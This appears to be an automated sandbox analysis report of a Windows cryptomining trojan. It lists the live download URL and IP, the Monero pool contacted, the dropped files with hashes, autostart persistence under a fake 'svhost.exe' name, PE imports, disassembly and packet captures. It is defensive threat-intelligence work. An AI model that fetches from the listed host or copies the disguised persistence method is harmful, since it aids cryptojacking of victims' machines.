      http://172.86.76.134:1111/audiodevice0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      xmr-us-east1.nanopool.org
      		51.222.106.253
      		truetrue
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://crl.cloudflare.com/origin_ca.crl04LX9x1PMAW.exe, 00000000.00000003.3343760698.000003648438C000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.00000000004CD000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ocsp.cloudflare.com/origin_ca4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364842FB000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.000000000043C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.cloudflare.com/origin_ca.crlS4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364843D6000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://wns.windows.com/e4LX9x1PMAW.exe, 00000000.00000003.3310916310.00000364843C4000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3335035446.000003648441F000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3335052114.00000364823CC000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3339978275.000003647E3FF000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.cloudflare.com/origin_ca.crlxF4LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364843D6000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://ocsp.cloudflare.com/origin_ca04LX9x1PMAW.exe, 00000000.00000003.3343760698.00000364843D6000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3343760698.000003648438C000.00000004.00001000.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.00000000004CD000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://172.86.76.134:1111/audiodevice4LX9x1PMAW.exe, 00000000.00000003.3189720333.000003647E130000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3197053450.000003647E130000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3210565344.000003647E130000.00000004.00001000.00020000.00000000.sdmp, 4LX9x1PMAW.exe, 00000000.00000003.3186135211.000003647E130000.00000004.00001000.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.cloudflare.com/origin_ca.crlwindowsaudioservice.exe, 00000005.00000002.3377767585.0000000000517000.00000004.00000020.00020000.00000000.sdmp, windowsaudioservice.exe, 00000005.00000002.3377767585.000000000043C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://docs.rs/getrandom#nodejs-es-module-supportsvhost.exe.0.drfalse
        • Avira URL Cloud: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        172.86.76.134
        		unknownUnited States
        		9009M247GBfalse
        51.79.71.77
        		unknownCanada
        		16276OVHFRfalse

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1487983
        Start date and time:2024-08-05 14:38:07 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 46s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:4LX9x1PMAW.exe
        renamed because original name is a hash value
        Original Sample Name:e211b2b230ef040fe40bc380899990fc.exe
        Detection:MAL
        Classification:mal100.troj.evad.mine.winEXE@6/3@1/2
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target windowsaudioservice.exe, PID 4824 because there are no executed function
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing network information.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        14:40:57AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svhost.exe C:\Users\user\AppData\Local\Windows\svhost.exe
        14:41:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svhost.exe C:\Users\user\AppData\Local\Windows\svhost.exe

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        51.79.71.77Aurora.exeGet hashmaliciousAurora, Quasar, RedLine, XmrigBrowse

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          xmr-us-east1.nanopool.orgAurora.exeGet hashmaliciousAurora, Quasar, RedLine, XmrigBrowse
          • 51.222.106.253
          daRNfwifay.exeGet hashmaliciousXmrigBrowse
          • 51.222.106.253
          vilxost.dllGet hashmaliciousXmrigBrowse
          • 144.217.14.139
          vilxost.dllGet hashmaliciousXmrigBrowse
          • 142.44.243.6
          dllhost.exeGet hashmaliciousNanominerBrowse
          • 192.99.69.170
          4rC1bQcnl5.exeGet hashmaliciousXmrigBrowse
          • 144.217.14.139
          LZF5sOWnss.exeGet hashmaliciousXmrigBrowse
          • 144.217.14.139
          4HoFnQosUb.exeGet hashmaliciousXmrigBrowse
          • 142.44.242.100
          P7Oa6i5muL.exeGet hashmaliciousXmrigBrowse
          • 142.44.242.100
          H9QnI1DbC1.exeGet hashmaliciousXmrigBrowse
          • 144.217.14.139

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          OVHFR .exeGet hashmaliciousUnknownBrowse
          • 51.81.61.70
          unLc6VekkL.elfGet hashmaliciousMiraiBrowse
          • 139.99.158.119
          17nDkQW4tK.elfGet hashmaliciousMiraiBrowse
          • 51.254.200.162
          CZyOWoN2hiszA6d.exeGet hashmaliciousFormBookBrowse
          • 158.69.95.141
          XagOs5aVxk.exeGet hashmaliciousRedLine, XWormBrowse
          • 51.89.201.41
          https://berobv.nl/Get hashmaliciousUnknownBrowse
          • 5.196.111.72
          https://ff-rewards-redeem-codes-org.github.io/Free-Fire-/Get hashmaliciousHTMLPhisherBrowse
          • 54.38.113.7
          b720EelfbG.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
          • 51.89.201.41
          KTx9b1TG5p.exeGet hashmaliciousRedLineBrowse
          • 51.89.201.41
          RlN9LL3e2r.exeGet hashmaliciousQuasarBrowse
          • 51.222.21.20
          M247GBb5qiFKb5FR.rtfGet hashmaliciousRemcosBrowse
          • 194.187.251.115
          mtwe 4678.xlsGet hashmaliciousRemcosBrowse
          • 194.187.251.115
          WindowsDefender.exeGet hashmaliciousUnknownBrowse
          • 185.221.198.114
          Geron Steel-Order-79376- Contract 2025.exeGet hashmaliciousRemcosBrowse
          • 206.123.148.53
          Geron Steel-Order-79376- Contract 2025.exeGet hashmaliciousRemcosBrowse
          • 206.123.148.53
          E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
          • 206.123.140.36
          Miner-XMR2.exeGet hashmaliciousXmrigBrowse
          • 206.123.140.36
          ECjuq8pNwb.rtfGet hashmaliciousRemcosBrowse
          • 194.187.251.115
          MLIN1877693.xlsGet hashmaliciousRemcosBrowse
          • 194.187.251.115
          XAjV9ghiIb.elfGet hashmaliciousMirai, MoobotBrowse
          • 185.94.197.147

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Windows\WinRing0x64.sysMenSncKnTI.exeGet hashmaliciousXmrigBrowse
            SecuriteInfo.com.Win64.Evo-gen.9790.15318.exeGet hashmaliciousXmrigBrowse
              setup.exeGet hashmaliciousXmrigBrowse
                Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                  E5r67vtBtc6.exeGet hashmaliciousXmrigBrowse
                    Miner-XMR2.exeGet hashmaliciousXmrigBrowse
                      DNQuHRCp7X.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                        n6o0pd9pZC.exeGet hashmaliciousXmrigBrowse
                          lfjG1UlwP1.exeGet hashmaliciousLummaC, XmrigBrowse
                            SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exeGet hashmaliciousLummaC, XmrigBrowse

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Windows\WinRing0x64.sys

                              Download File
                              Process:C:\Users\user\Desktop\4LX9x1PMAW.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):14544
                              Entropy (8bit):6.2660301556221185
                              Encrypted:false
                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                              MD5:0C0195C48B6B8582FA6F6373032118DA
                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 5%
                              Joe Sandbox View:
                              • Filename: MenSncKnTI.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.Win64.Evo-gen.9790.15318.exe, Detection: malicious, Browse
                              • Filename: setup.exe, Detection: malicious, Browse
                              • Filename: Xbox.exe, Detection: malicious, Browse
                              • Filename: E5r67vtBtc6.exe, Detection: malicious, Browse
                              • Filename: Miner-XMR2.exe, Detection: malicious, Browse
                              • Filename: DNQuHRCp7X.exe, Detection: malicious, Browse
                              • Filename: n6o0pd9pZC.exe, Detection: malicious, Browse
                              • Filename: lfjG1UlwP1.exe, Detection: malicious, Browse
                              • Filename: SecuriteInfo.com.Trojan.InjectNET.17.32646.13700.exe, Detection: malicious, Browse
                              Reputation:high, very likely benign file
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Windows\svhost.exe

                              Download File
                              Process:C:\Users\user\Desktop\4LX9x1PMAW.exe
                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):3414528
                              Entropy (8bit):6.151821605123249
                              Encrypted:false
                              SSDEEP:49152:IpMb87gil2wlWJDddoneZxq03EjlI+pOZjlx+o1Mj+6001YP:9bZRE4+Kr60n
                              MD5:E211B2B230EF040FE40BC380899990FC
                              SHA1:FE36DBF3EFA775193B82CE03D1B329D3FECED487
                              SHA-256:666C246BD662275C5A7330B4DE2E51A7F86556390C0B79B1D774378E7EAC8CB0
                              SHA-512:D8E52248278898617E42AFE93171F4400612B37B596C8FEF5D7F7D98A217A1F8FF86414A4F9E567D316980309A4E8D98050877DCEF139F24CB77C85764D979A3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 21%
                              Reputation:low
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.......:.?d?...:.?d>...:.?d9...:.9.;...:...;...:...;...:..g>...:...:...:..g...:..g8...:.Rich..:.................PE..d....A.f.........."....'.. .........d..........@..............................7...........`...................................................1...... 7......05.@............07.8P..`.*.......................*.(... .*.@............. ..............................text...`. ....... ................. ..`.rdata..`..... ....... .............@..@.data....y....1..F....1.............@....pdata..@....05.......1.............@..@_RDATA........7.......3.............@..@.rsrc........ 7.......3.............@..@.reloc..8P...07..R....3.............@..B........................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Windows\windowsaudioservice.exe

                              Download File
                              Process:C:\Users\user\Desktop\4LX9x1PMAW.exe
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):4876304
                              Entropy (8bit):7.984749054702349
                              Encrypted:false
                              SSDEEP:98304:WcqHgu/nJ6SzfWdD8SLzM9ukABjh+1Vu0zOeL0SxdaVTI0iVAw:WHgu/nESTWdD8SnxkABjhIVuWP0SxAlw
                              MD5:BC35928AAFC2827CE620E2AA679AADD5
                              SHA1:A6F772792E66154FACB2F0DF9EA068459D848F8E
                              SHA-256:9FA246F0DE2072D3BC060E6E532E76395FA73B5A2D2C4AA5FFDF66D190BAB446
                              SHA-512:D2D3F0C9B3FA7FD1D6496B141A801942EA6E09154B9D4D7318CFDDF10A3E7D129701FA775A92C09B3ED241B11E06078B074DE1FE107315664E743DB28AA3B558
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 38%
                              Reputation:low
                              Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.......E..............J.......J...............=.......=.......=.......=..`...J........>..........t...J...........R....>......>.......>........l......>......Rich............................PE..d....$.f.........."....'..7...D.....Xp.........@......................................J... .................................................6a|.......|.h....+..............................................@p|.(................................................... X.7......R.................. ..` .C....8......X..............@..@ ..*..`N..F....".............@... .....`y..(...\".............@..@ V....`{.......#.............@..` .&...p{.......#.............@..` ......{.......#.............@..` ......{.......#.............@..@ h.....{.......#.............@..@ ......{..d....#.............@..B.idata.......`|.......$.

                              Static File Info

                              General

                              File type:PE32+ executable (GUI) x86-64, for MS Windows
                              Entropy (8bit):6.151821605123249
                              TrID:
                              • Win64 Executable GUI (202006/5) 92.65%
                              • Win64 Executable (generic) (12005/4) 5.51%
                              • Generic Win/DOS Executable (2004/3) 0.92%
                              • DOS Executable Generic (2002/1) 0.92%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:4LX9x1PMAW.exe
                              File size:3'414'528 bytes
                              MD5:e211b2b230ef040fe40bc380899990fc
                              SHA1:fe36dbf3efa775193b82ce03d1b329d3feced487
                              SHA256:666c246bd662275c5a7330b4de2e51a7f86556390c0b79b1d774378e7eac8cb0
                              SHA512:d8e52248278898617e42afe93171f4400612b37b596c8fef5d7f7d98a217a1f8ff86414a4f9e567d316980309a4e8d98050877dcef139f24cb77c85764d979a3
                              SSDEEP:49152:IpMb87gil2wlWJDddoneZxq03EjlI+pOZjlx+o1Mj+6001YP:9bZRE4+Kr60n
                              TLSH:EBF53A257F8A99ADC05AC074834787726A7170CE0F35BAEF458486783F69AF51F3C298
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.......:.?d?...:.?d>...:.?d9...:.9.;...:...;...:...;...:..g>...:...:...:..g....:..g8...:.Rich..:................

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0x1401f9e64
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x140000000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66A94115 [Tue Jul 30 19:37:57 2024 UTC]
                              TLS Callbacks:0x401d3600, 0x1
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:0
                              File Version Major:6
                              File Version Minor:0
                              Subsystem Version Major:6
                              Subsystem Version Minor:0
                              Import Hash:dd2f2ecf71382d689c11a821fa0e4cae

                              Entrypoint Preview

                              Instruction
                              dec eax
                              sub esp, 28h
                              call 00007F22FCB962B4h
                              dec eax
                              add esp, 28h
                              jmp 00007F22FCB95947h
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              nop word ptr [eax+eax+00000000h]
                              dec eax
                              sub esp, 10h
                              dec esp
                              mov dword ptr [esp], edx
                              dec esp
                              mov dword ptr [esp+08h], ebx
                              dec ebp
                              xor ebx, ebx
                              dec esp
                              lea edx, dword ptr [esp+18h]
                              dec esp
                              sub edx, eax
                              dec ebp
                              cmovb edx, ebx
                              dec esp
                              mov ebx, dword ptr [00000010h]
                              dec ebp
                              cmp edx, ebx
                              jnc 00007F22FCB95AE8h
                              inc cx
                              and edx, 8D4DF000h
                              wait
                              add al, dh

                              Rich Headers

                              Programming Language:
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x318e9c0x1e0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3720000x2e8.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x3530000x1dc40.pdata
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3730000x5038.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2aea600x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x2aec000x28.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2ae9200x140.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20c0000x8a0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x20a9600x20aa002214aa20ba97b9cb170a0c83d79f5ed1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x20c0000x10ee600x10f000d732be0e76ae3523d065af631f4d983dFalse0.2953948411554428data5.2155446486531405IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x31b0000x379000x4600d8e2aa1726dc87378e40c54bd35a72a6False0.1357700892857143data2.211626123897244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .pdata0x3530000x1dc400x1de00914b7c1ad078fc55376a4c858583e07dFalse0.4945083682008368data6.274813909575507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              _RDATA0x3710000x1f40x20055383035606b276bf82274b2f99fafb9False0.53125data4.149556417805732IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x3720000x2e80x400f0342ab22a9aa1df46c2bcca6bf88ea1False0.33984375data2.4988932877541705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x3730000x50380x5200f36a4159684679a0fe2b93c95cab0cfcFalse0.4204935213414634data5.440473048392449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_VERSION0x3720600x288dataEnglishUnited States0.4783950617283951

                              Imports

                              DLLImport
                              ntdll.dllRtlNtStatusToDosError, RtlPcToFileHeader, NtDeviceIoControlFile, NtCreateFile, NtQuerySystemInformation, RtlGetVersion, NtWriteFile, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, RtlCaptureContext, NtQueryInformationProcess, NtCancelIoFileEx
                              kernel32.dllQueryPerformanceCounter, QueryPerformanceFrequency, GetProcessTimes, GetCurrentProcess, GetEnvironmentVariableA, GetCurrentProcessorNumber, GetSystemInfo, VirtualAlloc, VirtualFree, VirtualQuery, GetLargePageMinimum, FreeLibrary, GetProcAddress, LoadLibraryA, GetStdHandle, GetNumaHighestNodeNumber, SetFileCompletionNotificationModes, GetNumaNodeProcessorMask, WriteConsoleA, GetConsoleScreenBufferInfo, WriteFile, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, CreateIoCompletionPort, GetTickCount64, FlsFree, CreateMutexA, GetLogicalDrives, GetDiskFreeSpaceExW, GetExitCodeProcess, IsDebuggerPresent, InitializeSListHead, GetCurrentThreadId, IsProcessorFeaturePresent, LocalFree, ReleaseSRWLockShared, AcquireSRWLockShared, TryAcquireSRWLockExclusive, GetCurrentProcessId, SetHandleInformation, SleepConditionVariableSRW, RaiseException, GetProcessHeap, HeapAlloc, HeapFree, OpenProcess, EncodePointer, GetSystemTimes, GetProcessIoCounters, VirtualQueryEx, ReadProcessMemory, CreateFileW, FlsSetValue, FlsAlloc, GetLastError, GlobalMemoryStatusEx, WaitForSingleObjectEx, GetSystemTimeAsFileTime, GetCurrentThread, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, DeleteCriticalSection, GetDriveTypeW, GetVolumeInformationW, DeviceIoControl, CloseHandle, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeEnvironmentStringsW, DeleteProcThreadAttributeList, CompareStringOrdinal, AddVectoredExceptionHandler, SetThreadStackGuarantee, SwitchToThread, CreateWaitableTimerExW, SetWaitableTimer, WaitForSingleObject, Sleep, SetLastError, GetCurrentDirectoryW, GetEnvironmentStringsW, GetEnvironmentVariableW, SetUnhandledExceptionFilter, SetFileInformationByHandle, DuplicateHandle, CreateThread, WriteFileEx, SleepEx, TerminateProcess, WakeAllConditionVariable, WakeConditionVariable, UnhandledExceptionFilter, ReleaseMutex, GetModuleHandleA, FindClose, GetFileInformationByHandle, GetFileInformationByHandleEx, CreateDirectoryW, FindFirstFileW, GetFinalPathNameByHandleW, GetConsoleMode, LoadLibraryExW, GetModuleHandleW, FormatMessageW, GetModuleFileNameW, GetFullPathNameW, CreateNamedPipeW, ReadFileEx, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW
                              user32.dllFindWindowA
                              ws2_32.dllbind, connect, getsockname, getpeername, ioctlsocket, getsockopt, shutdown, send, WSASend, closesocket, setsockopt, WSAIoctl, WSAGetLastError, WSAStartup, recv, WSACleanup, WSASocketW, freeaddrinfo, getaddrinfo
                              secur32.dllLsaFreeReturnBuffer, LsaEnumerateLogonSessions, DeleteSecurityContext, LsaGetLogonSessionData, QueryContextAttributesW, FreeCredentialsHandle, ApplyControlToken, EncryptMessage, FreeContextBuffer, AcceptSecurityContext, InitializeSecurityContextW, DecryptMessage, AcquireCredentialsHandleA
                              advapi32.dllRegOpenKeyExW, AdjustTokenPrivileges, OpenProcessToken, SystemFunction036, IsValidSid, GetLengthSid, CopySid, RegSetValueExW, RegCloseKey, LookupAccountSidW, RegQueryValueExW, LookupPrivilegeValueA, GetTokenInformation
                              crypt32.dllCertGetCertificateChain, CertVerifyCertificateChainPolicy, CertFreeCertificateContext, CertDuplicateCertificateContext, CertFreeCertificateChain, CertDuplicateStore, CertDuplicateCertificateChain, CertCloseStore, CertOpenStore, CertAddCertificateContextToStore, CertEnumCertificatesInStore
                              bcrypt.dllBCryptGenRandom
                              pdh.dllPdhOpenQueryA, PdhCloseQuery, PdhRemoveCounter, PdhGetFormattedCounterValue, PdhAddEnglishCounterW, PdhCollectQueryData
                              powrprof.dllCallNtPowerInformation
                              psapi.dllGetModuleFileNameExW, GetPerformanceInfo
                              ole32.dllCoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket, CoUninitialize
                              oleaut32.dllSysFreeString, SysAllocString, VariantClear
                              shell32.dllCommandLineToArgvW
                              iphlpapi.dllGetIfEntry2, FreeMibTable, GetIfTable2, GetAdaptersAddresses
                              netapi32.dllNetUserEnum, NetApiBufferFree, NetUserGetInfo, NetUserGetLocalGroups
                              api-ms-win-crt-string-l1-1-0.dllwcslen, wcsncmp, strcpy_s
                              api-ms-win-crt-math-l1-1-0.dll__setusermatherr, pow
                              api-ms-win-crt-runtime-l1-1-0.dll_initterm, _get_initial_narrow_environment, _initialize_narrow_environment, exit, _exit, terminate, __p___argc, _configure_narrow_argv, _set_app_type, _seh_filter_exe, __p___argv, _cexit, _c_exit, _crt_atexit, _register_thread_local_exe_atexit_callback, _initterm_e, _register_onexit_function, abort, _errno, _initialize_onexit_table
                              api-ms-win-crt-convert-l1-1-0.dllstrtol
                              api-ms-win-crt-stdio-l1-1-0.dllfputs, __stdio_common_vsprintf, _set_fmode, __p__commode, __acrt_iob_func
                              api-ms-win-crt-heap-l1-1-0.dll_set_new_mode, malloc, calloc, free, realloc
                              api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                              2024-08-05T14:40:53.480891+0200TCP2008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File111149722172.86.76.134192.168.2.6

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Aug 5, 2024 14:40:47.991547108 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:47.996452093 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:47.996545076 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:47.997586966 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.002769947 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.626929998 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.626998901 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627036095 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627068996 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627103090 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627118111 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.627139091 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627165079 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.627176046 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627183914 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.627293110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627338886 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.627347946 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627382040 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.627418995 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.632174969 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.632210016 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.632244110 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.632253885 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.683700085 CEST497211111192.168.2.6172.86.76.134
                              Aug 5, 2024 14:40:48.715697050 CEST111149721172.86.76.134192.168.2.6
                              Aug 5, 2024 14:40:48.715724945 CEST111149721172.86.76.134192.168.2.6
